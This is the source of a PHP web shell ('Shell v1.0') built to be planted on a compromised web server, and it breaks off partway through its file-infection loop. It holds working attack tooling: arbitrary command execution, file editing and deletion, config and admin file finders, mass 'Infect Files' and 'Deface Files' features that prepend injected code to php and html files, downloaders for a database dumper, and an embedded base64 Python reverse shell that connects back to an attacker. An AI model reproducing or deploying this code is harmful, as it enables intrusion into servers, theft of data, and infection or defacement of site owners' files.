1<?php
2//Shell v1.0
3
4//Set a few ini settings to help performance and experience
5//I'd suggest not editing these
6@ini_set("memory_limit","9999M");
7@ini_set("max_execution_time", "0");
8@ini_set("upload_max_filesize", "9999m");
9@ini_set("magic_quotes_gpc", "0");
10set_time_limit(0);
11error_reporting(0);
12
13//Style variables, edit to your liking.
14//Font style
15$fontcolor = "#FFFFFF";
16$fontsize = "13px";
17$fontweight = "normal";
18
//Table style
20$tablebordercolor = "none";
21$tablebgcolor = "none";
22$tablehovercolor = "#E66C2C";
23
24//Textarea style
25$textareabgcolor = "#141414";
26$textareafontcolor = "#FFFFFF";
27$textareabordercolor = "#FF0000";
28
//Input style
30$inputbgcolor = "#141414";
31$inputfontcolor = "#FFFFFF";
32$inputbordercolor = "#FF0000";
33
34//Link style
35$linkcolor = "#FF0000";
36$activelinkcolor = "#FF0000";
37$hoverlinkcolor = "#FFFFFF";
38$visitedlinkcolor = "#FF0000";
39
40//Nav bar tabs
41$currentfile = basename(__FILE__);
42$tabs = array(
43 "Domain Information" => "./".$currentfile."?domainInformation",
44 "Hash Generator" => "./".$currentfile."?hashGenerator",
45 "Search" => array(
46 "Search Files/Dirs" => "./".$currentfile."?search",
47 "Config Finder" => "./".$currentfile."?configFinder",
48 "Admin Finder" => "./".$currentfile."?adminFinder"
49 ),
50 "Mass" => array(
51 "Infect Files" => "./".$currentfile."?fileInfect",
52 "Deface Files" => "./".$currentfile."?fileDeface"
53 ),
54 "MySQL Dumper" => array(
55 "MySQL Dumper v2.1" => "./".$currentfile."?installMSD",
56 "MySQL Dumper v1.24.4" => "./".$currentfile."?installMSD2"
57 ),
58 "Back Connect" => array(
59 "Perl" => "./".$currentfile."?bcPerl",
60 "Python" => "./".$currentfile."?bcPython",
61 "PHP" => "./".$currentfile."?bcPHP"
62 ),
63 "System" => array(
64 "Users" => "./".$currentfile."?users",
65 "Processes" => "./".$currentfile."?processes",
66 "Memory" => "./".$currentfile."?memory",
67 "CPU" => "./".$currentfile."?cpu"
68 ),
69 "Shell" => array(
70 "Check Links" => "./".$currentfile."?checkLinks",
71 "Credits" => "./".$currentfile."?credits",
72 "Kill" => "./".$currentfile."?kill"
73 )
74 );
75
76$links = array(
77 "MSD1" => array(
78 "LINK" => "https://dl.dropbox.com/s/5c0ch3cn03s73kr/msdv2.zip",
79 "MD5" => "bfd2f24a2a32277cc4babbc42649b3c1",
80 "DESC" => "MySQL Dumper v2.1 By: Plum"
81 ),
82 "MSD2" => array(
83 "LINK" => "https://dl.dropbox.com/s/nerui8jax2p2fwf/msd1.24.4.zip",
84 "MD5" => "9948baad310e0a4be04bb3f20f89938c",
85 "DESC" => "MySQL Dumper v1.24.4 By: http://www.mysqldumper.net/"
86 ),
87 "BOOTSTRAPCSS" => array(
88 "LINK" => "https://dl.dropbox.com/s/cr4prh66oli27m2/bootstrap_navbar.css",
89 "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
90 "DESC" => "Bootstrap Nav Bar CSS"
91 ),
92 "BOOTSTRAPJS" => array(
93 "LINK" => "https://dl.dropbox.com/s/5fn4xs7niie5s8v/bootstrap-dropdown.js",
94 "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
95 "DESC" => "Bootstrap Dropdown JS"
96 ),
97 "BACKGROUND" => array(
98 "LINK" => "https://dl.dropbox.com/s/gir6etllsswdc91/background.png",
99 "MD5" => "ec548490a2fd381c41cf7a3c17b93500",
100 "DESC" => "Background image"
101 )
102 );
103
104//Some variables
105if(!@$_GET['dir']) {
106 $dir = CleanDir(getcwd());
107} else {
108 $dir = CleanDir($_GET['dir']);
109}
110$version = "1.0";
111$yourip = $_SERVER['REMOTE_ADDR'];
112$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
113$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
114$uname = php_uname();
115$serversoftware = $_SERVER['SERVER_SOFTWARE'];
116$gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
117$servername = $_SERVER['SERVER_NAME'];
118$serverip = $_SERVER['SERVER_ADDR'];
119$safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
120$openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
121$disabledfunc = ini_get('disable_functions');
122$phpversion = phpversion();
123$domain = $_SERVER['HTTP_HOST'];
124$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
125$syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
126$compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
127
128//Base64'd stuff
129$bcpl = "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";
130$bcpy = "IyEgL3Vzci9iaW4vZW52IHB5dGhvbg0KDQojIENvcHlyaWdodCAoYykgMjAxMSBYYXZpZXIgR2FyY2lhIHd3dy5zaGVsbGd1YXJkaWFucy5jb20NCiMgQWxsIHJpZ2h0cyByZXNlcnZlZC4NCiMNCiMgIEJhc2VkIG9uIHRoZSBQeXRob24gY29ubmVjdCBiYWNrIHNoZWxsIHdyaXR0ZW4gYnkgRGF2aWQgS2VubmVkeQ0KIyAgaHR0cDovL3d3dy5zZWNtYW5pYWMuY29tL2p1bmUtMjAxMS9jcmVhdGluZy1hLTEzLWxpbmUtYmFja2Rvb3Itd29ycnktZnJlZS1vZi1hdi8NCiMNCiMgQWRkZWQgY29tbWFuZCBsaW5lIGFyZ3VtZW50cyBmb3IgZWFzeSBleGVjdXRpb24NCiMgU29ycnkgYWJvdXQgcmVtb3ZpbmcgdGhlIHJlc3Qgb2YgdGhlIGNvbW1lbnRzDQojIFRyeWluZyB0byBzYXZlIHNwYWNlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQppbXBvcnQgc29ja2V0DQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCg0KaWYgbGVuKHN5cy5hcmd2KSA8IDM6DQoJcHJpbnQoJ1VzYWdlOiBweXRob24gJytzeXMuYXJndlswXSsnIDxJUD4gPFBPUlQ+JykNCglwcmludCgnRXhhbXBsZTogcHl0aG9uICcrc3lzLmFyZ3ZbMF0rJyAxMjcuMC4wLjEgMjEyMScpDQoJc3lzLmV4aXQoKQ0KDQpIT1NUID0gc3lzLmFyZ3ZbMV0gICAgIyBUaGUgcmVtb3RlIGhvc3QNClBPUlQgPSBpbnQoc3lzLmFyZ3ZbMl0pICAgIyBUaGUgc2FtZSBwb3J0IGFzIHVzZWQgYnkgdGhlIHNlcnZlcg0KDQpkZWYgY29ubmVjdCgoaG9zdCwgcG9ydCkpOg0KCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQoJcy5jb25uZWN0KChob3N0LCBwb3J0KSkNCglyZXR1cm4gcw0KDQpkZWYgd2FpdF9mb3JfY29tbWFuZChzKToNCglkYXRhID0gcy5yZWN2KDEwMjQpDQoJaWYgZGF0YSA9PSAiZXhpdFxuIjoNCgkJcy5jbG9zZSgpDQoJCXN5cy5leGl0KDApDQoJIyB0aGUgc29ja2V0IGRpZWQNCgllbGlmIGxlbihkYXRhKT09MDoNCgkJcmV0dXJuIFRydWUNCgllbHNlOg0KCQkjIGRvIHNoZWxsIGNvbW1hbmQNCgkJcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oZGF0YSwgc2hlbGw9VHJ1ZSwNCgkJCXN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsDQoJCQlzdGRpbj1zdWJwcm9jZXNzLlBJUEUpDQoJCSMgcmVhZCBvdXRwdXQNCgkJc3Rkb3V0X3ZhbHVlID0gcHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpDQoJCSMgc2VuZCBvdXRwdXQgdG8gYXR0YWNrZXINCgkJcy5zZW5kKHN0ZG91dF92YWx1ZSkNCgkJcmV0dXJuIEZhbHNlDQoNCmRlZiBtYWluKCk6DQoJd2hpbGUgVHJ1ZToNCgkJc29ja2VkX2RpZWQ9RmFsc2UNCgkJdHJ5Og0KCQkJcz1jb25uZWN0KChIT1NULFBPUlQpKQ0KCQkJd2hpbGUgbm90IHNvY2tlZF9kaWVkOg0KCQkJCXNvY2tlZF9kaWVkPXdhaXRfZm9yX2NvbW1hbmQocykNCgkJCXMuY2xvc2UoKQ0KCQlleGNlcHQgc29ja2V0
LmVycm9yOg0KCQkJcGFzcw0KCQl0aW1lLnNsZWVwKDUpDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoJc3lzLmV4aXQobWFpbigpKQ==";
131
132//Some functions
function CleanDir($directory) {
    // Normalise a path for display/links: every backslash becomes a forward
    // slash, then one left-to-right pass collapses each "//" pair into "/".
    // Like the original, a run of three slashes is reduced to two, not one.
    $forwardSlashed = strtr($directory, array("\\" => "/"));
    return strtr($forwardSlashed, array("//" => "/"));
}
138
function ByteConversion($bytes, $precision = 2) {
    // Render a byte count with a binary-prefixed unit (KB/MB/GB/TB), rounding
    // to $precision decimals. Counts below 1024 and negative counts are
    // returned as a plain "<n> B", matching the original if/elseif ladder.
    if ($bytes < 0) {
        return $bytes . ' B';
    }
    $thresholds = array(
        'TB' => 1024 * 1024 * 1024 * 1024,
        'GB' => 1024 * 1024 * 1024,
        'MB' => 1024 * 1024,
        'KB' => 1024,
    );
    // Largest unit first, so the first threshold reached is the right one.
    foreach ($thresholds as $unit => $size) {
        if ($bytes >= $size) {
            return round($bytes / $size, $precision) . ' ' . $unit;
        }
    }
    return $bytes . ' B';
}
159
function success($message) {
    // Print a centred, large, bold green line. $message is inserted verbatim
    // (no HTML escaping), so only trusted, server-generated text belongs here.
    printf("<center><font color='green' size='5'><b>%s</b></font></center>", $message);
}
163
function error($message) {
    // Print a centred, large, bold red line. $message is inserted verbatim
    // (no HTML escaping), so only trusted, server-generated text belongs here.
    printf("<center><font color='red' size='5'><b>%s</b></font></center>", $message);
}
167
function redirect($url) {
    // Client-side redirect: emits a script that assigns window.location.
    // $url is interpolated without escaping, so a quote inside it would break
    // out of the JavaScript string literal.
    echo '<script>window.location = \'' . $url . '\';</script>';
}
171
function mass_files($mass_dir, $justdirs) {
    // Recursively list $mass_dir: directory paths when $justdirs is truthy,
    // regular-file paths otherwise. Entries whose name starts with '.' are
    // skipped at every level. Returns an array of "$mass_dir/<name>" strings,
    // or null (falls off the end) when the directory cannot be opened.
    $handle = opendir($mass_dir);
    if (!$handle) {
        return;
    }
    $found = array();
    // Loop ends on the first falsy readdir() value, as in the original.
    while ($entry = readdir($handle)) {
        if ($entry == "." || $entry == ".." || $entry[0] == '.') {
            continue;
        }
        $path = "$mass_dir/$entry";
        if (!is_dir($path)) {
            if (!$justdirs) {
                $found[] = $path;
            }
            continue;
        }
        // Descend first, then record the directory itself after its contents.
        $nested = mass_files($path, $justdirs);
        if (is_array($nested)) {
            $found = array_merge($found, $nested);
        }
        if ($justdirs) {
            $found[] = $path;
        }
    }
    closedir($handle);
    return $found;
}
191
192function can_exe() {
193 global $disabledfunc;
194 global $syscoms;
195 $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
196 if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
197 return false;
198 } else {
199 return true;
200 }
201}
202
203function exe_cmd($command) {
204 global $dir;
205 chdir($dir);
206 if(function_exists('proc_open')) {
207 $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
208 $result = "";
209 while (!feof($io[1])) {
210 $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
211 }
212 while (!feof($io[2])) {
213 $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
214 }
215 fclose($io[1]);
216 fclose($io[2]);
217 proc_close($execute);
218 return $result;
219 } elseif(function_exists('system')) {
220 $result = system($command);
221 return $result;
222 } elseif(function_exists('exec')) {
223 $result = exec($command);
224 return $result;
225 } elseif(functions_exists('shell_exec')) {
226 $result = shell_exec($command);
227 return $result;
228 } elseif(function_exists('passthru')) {
229 $result = passthru($command);
230 return $result;
231 }
232}
233
function salt_gen($length) {
    // Build a $length-character string from ASCII letters (both cases) and the
    // digits 1-9 (0 is deliberately absent). Each character is chosen with
    // array_rand(), which is not a cryptographic random source.
    $alphabet = array();
    foreach (range('a', 'z') as $letter) {
        $alphabet[] = $letter;
        $alphabet[] = strtoupper($letter);
    }
    foreach (range(1, 9) as $digit) {
        $alphabet[] = (string) $digit;
    }
    $salt = '';
    for ($n = 0; $n < $length; $n++) {
        $salt .= $alphabet[array_rand($alphabet)];
    }
    return $salt;
}
245
246function extract_file($filepath, $extractpath, $type) {
247 if($type == 'zip') {
248 if(class_exists('ZipArchive')) {
249 $newzip = new ZipArchive;
250 $open = $newzip->open($filepath);
251 if($open == true) {
252 $newzip->extractTo($extractpath);
253 $newzip->close();
254 redirect("?dir=$extractpath");
255 } else {
256 error('Failed to open zip archive!');
257 }
258 } else {
259 if(can_exe()) {
260 error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
261 echo "<center>
262 The response from 'unzip $filepath -d $extractpath' was:<br>
263 <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
264 </center>";
265 } else {
266 error('Zip archive does not exist and commands can not be executed!');
267 }
268 }
269 } elseif($type == 'tar') {
270 if(class_exists('PharData')) {
271 $newphar = new PharData($filepath);
272 $newphar->extractTo($extractpath);
273 unlink($filepath);
274 redirect("?dir=$extractpath");
275 } else {
276 if(can_exe()) {
277 error('PharData class does not exist!<br>Trying to extract via sys commands');
278 echo "<center>
279 The response from 'tar xvf $filepath -C $extractpath' was:<br>
280 <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
281 </center>";
282 } else {
283 error('PharData class does not exist and commands can not be executed!');
284 }
285 }
286 } elseif($type == 'gz') {
287 if(function_exists('gzopen')) {
288 $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
289 $open = gzopen($filepath, "rb");
290
291 while($contents = gzread($open, 4096)) {
292 file_put_contents($decomname, $contents, FILE_APPEND);
293 }
294 gzclose($open);
295 redirect("?dir=$extractpath");
296 } else {
297 if(can_exe()) {
298 $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
299 error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
300 echo "<center>
301 The response from 'gunzip -c $filepath > $decomname' was:<br>
302 <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
303 </center>";
304 } else {
305 error('Zlib does not seem to be enabled and commands can not be executed!');
306 }
307 }
308 } elseif($type == 'tgz') {
309 if(class_exists('PharData')) {
310 $newphar = new PharData($filepath);
311 $newphar->decompress();
312
313 $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
314 $newphar->extractTo($extractpath);
315 unlink($filepath);
316 unlink(str_replace(".tgz", ".tar", $filepath));
317 redirect("?dir=$extractpath");
318 } else {
319 if(can_exe()) {
320 error('PharData class does not exist!<br>Trying to extract via sys commands.');
321 echo "<center>
322 The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
323 <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
324 </center>";
325 } else {
326 error('PharData class does not exist and commands can not be executed!');
327 }
328 }
329 } elseif($type == 'rar') {
330 if(class_exists('RarArchive')) {
331 $openrar = RarArchive::open($filepath);
332
333 if($raropen == true) {
334 $entries = $openrar->getEntries();
335 foreach($entries as $files) {
336 $files->extract($extractpath);
337 }
338 $openrar->close();
339 } else {
340 error('Failed to open rar file!');
341 $openrar->close();
342 }
343 } else {
344 if(can_exe()) {
345 error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
346 echo "<center>
347 The response from 'unrar x $filepath $extractpath' was:<br>
348 <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
349 </center>";
350 } else {
351 error('RarArchive class does not exist and commands can not be executed!');
352 }
353 }
354 }
355}
356
//Let's initialize the stylesheet
358echo "
359<link rel='stylesheet' type='text/css' href='".$links['BOOTSTRAPCSS']['LINK']."'>
360<script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
361<script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
362<style>
363body {
364 background: #141414 url('".$links['BACKGROUND']['LINK']."');
365 color: $fontcolor;
366 padding-top: 100px !important;
367 margin:0;
368 font-family:\"Helvetica Neue\",Helvetica,Arial,sans-serif;
369 font-size:$fontsize;
370 font-weight:$fontweight;
371}
372table{
373 border-color: $tablebordercolor;
374 background-color: $tablebgcolor;
375}
376#hover tr:hover{
377 background-color: $tablehovercolor;
378}
379textarea {
380 background-color: $textareabgcolor;
381 resize:none;
382 color: $textareafontcolor;
383 border-color: $textareabordercolor;
384 outline: none;
385}
386input {
387 background-color: $inputbgcolor;
388 resize:none;
389 color: $inputfontcolor;
390 border-color: $inputbordercolor;
391 outline: none;
392}
393a:link {color: $linkcolor; text-decoration: none; }
394a:active {color: $activelinkcolor; text-decoration: none; }
395a:visited {color: $visitedlinkcolor; text-decoration: none; }
396a:hover {color: $hoverlinkcolor; text-decoration: none; }
397</style>";
398
399//Let's display nav bar
400echo <<<html
401<script>
402 $(window).load(function(){
403 $('#topbar').dropdown();
404 });
405</script>
406<div class="topbar" id="topbar">
407 <div class="fill">
408 <div class="container">
409 <a class="brand" href="./$currentfile">Home</a>
410 <ul class="nav">
411html;
412foreach($tabs as $title => $link) {
413 if(is_array($link)) {
414 echo '<li class="menu">
415 <a href="#" class="menu">'.$title.'</a>
416 <ul class="menu-dropdown">';
417 foreach($link as $dtitle => $dlink) {
418 echo "<li><a href='$dlink'>$dtitle</a></li>";
419 }
420 echo "</ul>";
421 } else {
422 echo "<li><a href='$link'>$title</a></li>";
423 }
424}
425echo <<<html
426 </ul>
427 </div>
428 </div>
429</div>
430html;
431
432//Let's display system bar
433if(empty($disabledfunc)) {
434 $disabledfun = "None";
435} else {
436 $count = count(explode(",", $disabledfunc));
437 $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
438}
439echo <<<html
440<table width="100%" border="1">
441 <tr>
442 <th>Your IP</th>
443 <th>User</th>
444 <th>System</th>
445 <th>Server Software</th>
446 <th>Gateway Interface</th>
447 <th>PHP Version</th>
448 <th>Server Name</th>
449 <th>Server IP</th>
450 <th>safe_mode</th>
451 <th>open_basedir</th>
452 <th>Disabled Functions</th>
453 </tr>
454 <tr>
455 <td>$yourip</td>
456 <td>$whoami</td>
457 <td>$uname</td>
458 <td>$serversoftware</td>
459 <td>$gatewayinterface</td>
460 <td>$phpversion</td>
461 <td>$servername</td>
462 <td>$serverip</td>
463 <td>$safemode</td>
464 <td>$openbasedir</td>
465 <td>$disabledfun</td>
466 </tr>
467</table><br><br>
468html;
469
470//Anything to be displayed between the system bar and files should go here.
471
472//Read/Edit file stuff
473if(isset($_POST['save_file'])) {
474 $file = $_GET['edit'];
475 $newcontent = $_POST['edit_file'];
476 if(get_magic_quotes_gpc()) {
477 $newcontent = stripslashes($newcontent);
478 }
479 if(file_put_contents($file, $newcontent)) {
480 success("File has been saved successfully!");
481 } else {
482 error("File was not saved successfully!");
483 }
484}
485if(isset($_POST['delete_file'])) {
486 $file = $_GET['edit'];
487 if(unlink($file)) {
488 success("File was successfully deleted!");
489 } else {
490 error("File could not be deleted successfully!");
491 }
492}
493
494if(isset($_GET['delF'])) {
495 $file = $_GET['delF'];
496 if(unlink($file)) {
497 success("File was successfully deleted!");
498 } else {
499 error("File could not be deleted successfully!");
500 }
501}
502
503if(isset($_GET['delD'])) {
504 $ddir = $_GET['delD'];
505 if(can_exe()) {
506 echo "<center>
507 The response from 'rm -rf $ddir' was:<br>
508 <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
509 </center>";
510 } else {
511 if(rmdir($ddir)) {
512 success("Directory successfully deleted!");
513 } else {
514 error("Failed to delete directory!");
515 }
516 }
517}
518
519if(isset($_GET['edit'])) {
520 $file = $_GET['edit'];
521 if(file_exists($file)) {
522 $content = htmlspecialchars(file_get_contents($file));
523 if(!is_writeable($file)) {
524 echo "<center>
525 <font color='red' size=5>This file is read only!</font><br>
526 <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
527 </center>";
528 } else {
529 echo "<center>
530 <form action='' method='post'>
531 <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
532 <input type='submit' name='save_file' value='Save'>
533 <input type='submit' name='delete_file' value='Delete'>
534 </form>
535 </center>";
536 }
537 } else {
538 error("File does not exist!");
539 }
540}
541
542//Rename file stuff
543if(isset($_POST['rename'])) {
544 $newname = $_POST['new_name'];
545 $oldname = $_GET['rename'];
546 $rdir = $_GET['rdir'];
547 if(rename("$rdir/$oldname", "$rdir/$newname")) {
548 success("File was successfully renamed to: $newname");
549 } else {
550 error("File was not renamed!");
551 }
552}
553
554if(isset($_GET['rename'])) {
555 $oldname = $_GET['rename'];
556 echo "<center>
557 <form action='' method='post'>
558 Rename: <input type='text' name='new_name' value='$oldname'>
559 <input type='submit' name='rename' value='rename'>
560 </form>
561 </center>";
562}
563
564//Domain information stuff
565if(isset($_GET['domainInformation'])) {
566 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
567 $num = 0;
568 $count = sizeof($dns_record);
569 echo "<br>Name Servers:</b><br>";
570 while($num < $count) {
571 $name_servers = $dns_record[$num];
572 $name_servers2 = $name_servers['type'];
573 $name_servers3 = @$name_servers['target'];
574 $num++;
575 if($name_servers2 == "NS") {
576 echo "$name_servers3<br>";
577 $nshost = @$name_servers['host'];
578 }
579 if($name_servers2 == "SOA") {
580 $nsemail = $name_servers['rname'];
581 }
582 if($name_servers2 == "A") {
583 $nsip = $name_servers['ip'];
584 }
585 }
586 echo "<br><table class='noborder'>
587 <tr>
588 <td><b>Host:</b></td>
589 <td>$nshost</td>
590 </tr>
591 <tr>
592 <td><b>IP:</b></td>
593 <td>$nsip</td>
594 </tr>
595 <tr>
596 <td><b>Email:</b></td>
597 <td>$nsemail</td>
598 </tr>
599 </table><br>";
600 $num = 0;
601 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
602 $status = $domains_on_server->status;
603 $message = $domains_on_server->message;
604 $domainAr = $domains_on_server->domainArray;
605 $num_of_site = $domains_on_server->domainCount;
606 $count = sizeof($domainAr);
607 if($status == "Success") {
608 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
609 while($num < $count) {
610 $hossites = $domainAr[$num];
611 $num++;
612 $hossites3 = $domainAr[$num];
613 $hossites3 = $hossites3[0];
614 $hossites = $hossites[0];
615 $site_ips = empty($hossites) ? "" : "(" .gethostbyname($hossites). ")";
616 $site_ips2 = empty($hossites3) ? "" : "(" .gethostbyname($hossites3). ")";
617 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
618 $num++;
619 }
620 echo "</table><br>";
621 $num = 0;
622 } else {
623 error("Failed to find or get sites hosted on same server from: <a href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
624 }
625}
626
627//Search files and directories
628if(isset($_GET['search'])) {
629 echo "<center>
630 <form action='' method='post'>
631 Search for value in file and directory names.<br>
632 Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
633 Value to search for: <input type='text' name='search_val'><br>
634 <input type='submit' name='search' value='Search'>
635 </form>
636 </center>";
637}
638if(isset($_POST['search'])) {
639 $searchdir = $_POST['search_dir'];
640 $searchval = $_POST['search_val'];
641 echo "Search results that contain '$searchval' in file names.<br>";
642 foreach(mass_files($searchdir, false) as $key => $filename) {
643 $basename = pathinfo($filename, PATHINFO_BASENAME);
644 if(preg_match('/'.$searchval.'/', $basename)) {
645 echo "<a href='?edit=$filename'>$filename</a><br>";
646 }
647 }
648 echo "<br>Search results that contain '$searchval' in directory names.<br>";
649 foreach(mass_files($searchdir, true) as $key => $dirname) {
650 $basename = pathinfo($dirname, PATHINFO_BASENAME);
651 if(preg_match('/'.$searchval.'/', $basename)) {
652 echo "<a href='?dir=$dirname'>$dirname</a><br>";
653 }
654 }
655}
656
657//Config finder
658if(isset($_GET['configFinder'])) {
659 echo "Search results that contain 'config' in file names.<br>";
660 foreach(mass_files($rootdir, false) as $key => $filename) {
661 $basename = pathinfo($filename, PATHINFO_BASENAME);
662 if(preg_match('/config/', $basename)) {
663 echo "<a href='?edit=$filename'>$filename</a><br>";
664 }
665 }
666 echo "<br>Search results that contain 'config' in directory names.<br>";
667 foreach(mass_files($rootdir, true) as $key => $filename) {
668 $basename = pathinfo($filename, PATHINFO_BASENAME);
669 if(preg_match('/config/', $basename)) {
670 echo "<a href='?edit=$filename'>$filename</a><br>";
671 }
672 }
673}
674
675//Admin finder
676if(isset($_GET['adminFinder'])) {
677 echo "Search results that contain 'admin' in directory names.<br>";
678 foreach(mass_files($rootdir, true) as $key => $filename) {
679 $basename = pathinfo($filename, PATHINFO_BASENAME);
680 if(preg_match('/admin/', $basename)) {
681 echo "<a href='?edit=$filename'>$filename</a><br>";
682 }
683 }
684 echo "<br>Search results that contain 'admin' in file names.<br>";
685 foreach(mass_files($rootdir, false) as $key => $filename) {
686 $basename = pathinfo($filename, PATHINFO_BASENAME);
687 if(preg_match('/admin/', $basename)) {
688 echo "<a href='?edit=$filename'>$filename</a><br>";
689 }
690 }
691}
692
693//Hash generator
694if(isset($_GET['hashGenerator'])) {
695 echo "<center>
696 <form action='' method='post'>
697 String to hash:<br>
698 <input type='text' name='string'>
699 <input type='submit' name='generate_hashes' value='Hash'>
700 </form>
701 </center>";
702}
703if(isset($_POST['generate_hashes'])) {
704 $string = $_POST['string'];
705 $md5 = md5($string);
706 $md52 = md5(md5($string));
707 $md53 = md5(md5(md5($string)));
708 $sha1 = sha1($string);
709 $sha12 = sha1(sha1($string));
710 $sha13 = sha1(sha1(sha1($string)));
711 $joomlasalt = salt_gen("4");
712 $joomlahash = md5($string.$joomlasalt);
713 $oscommsalt = salt_gen("2");
714 $oscommhash = md5($oscommsalt.$string);
715 $vbsalt = salt_gen("3");
716 $vbhash = md5(md5($string).$vbsalt);
717 $vbsalt2 = salt_gen("30");
718 $vbhash2 = md5(md5($string).$vbsalt2);
719 $mybbsalt = salt_gen("8");
720 $mybbhash = md5(md5($mybbsalt).md5($string));
721 $mybbsalt2 = salt_gen("8");
722 $mybbhash2 = md5(md5($mybbsalt2).$string);
723 $ipbsalt = salt_gen("5");
724 $ipbhash = md5(md5($ipbsalt).md5($string));
725 echo "<center>
726 <textarea cols='120' rows='25' readonly>";
727 echo 'md5($pass): '.$md5."\n";
728 echo 'md5(md5($pass)): '.$md52."\n";
729 echo 'md5(md5(md5($pass))): '.$md53."\n";
730 echo 'sha1($pass): '.$sha1."\n";
731 echo 'sha1(sha1($pass)): '.$sha12."\n";
732 echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
733 echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
734 echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
735 echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
736 echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
737 echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
738 echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
739 echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
740 echo "</textarea>
741 </center>";
742}
743
744//Extract files
745if(isset($_GET['extract'])) {
746 $file = $_GET['extract'];
747 $epath = $_GET['epath'];
748 $type = $_GET['type'];
749 extract_file($file, $epath, $type);
750}
751
752//Infect files
753if(isset($_POST['do_infect'])) {
754 $infdir = rtrim($_POST['infect_dir'], '/');
755 $type = $_POST['infect_type'];
756 $infcode = $_POST['infect_code'];
757 if(is_dir($infdir)) {
758 $success = 0;
759 $failed = 0;
760 foreach(mass_files($infdir, false) as $key => $files) {
761 $exten = pathinfo($files, PATHINFO_EXTENSION);
762 if($type == 'php') {
763 if($exten == 'php') {
764 $content = $infcode;
765 $content .= file_get_contents($files);
766 if(file_put_contents($files, $content)) {
767 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
768 $success++;
769 } else {
770 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
771 $failed++;
772 }
773 }
774 } elseif($type == 'html') {
775 if($exten == 'html') {
776 $content = $infcode;
777 $content .= file_get_contents($files);
778 if(file_put_contents($files, $content)) {
779 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
780 $success++;
781 } else {
782 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
783 $failed++;
784 }
785 }
786 } elseif($type == 'both') {
787 if($exten == 'html' or $exten == 'php') {
788 $content = $infcode;
789 $content .= file_get_contents($files);
790 if(file_put_contents($files, $content)) {
791 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
792 $success++;
793 } else {
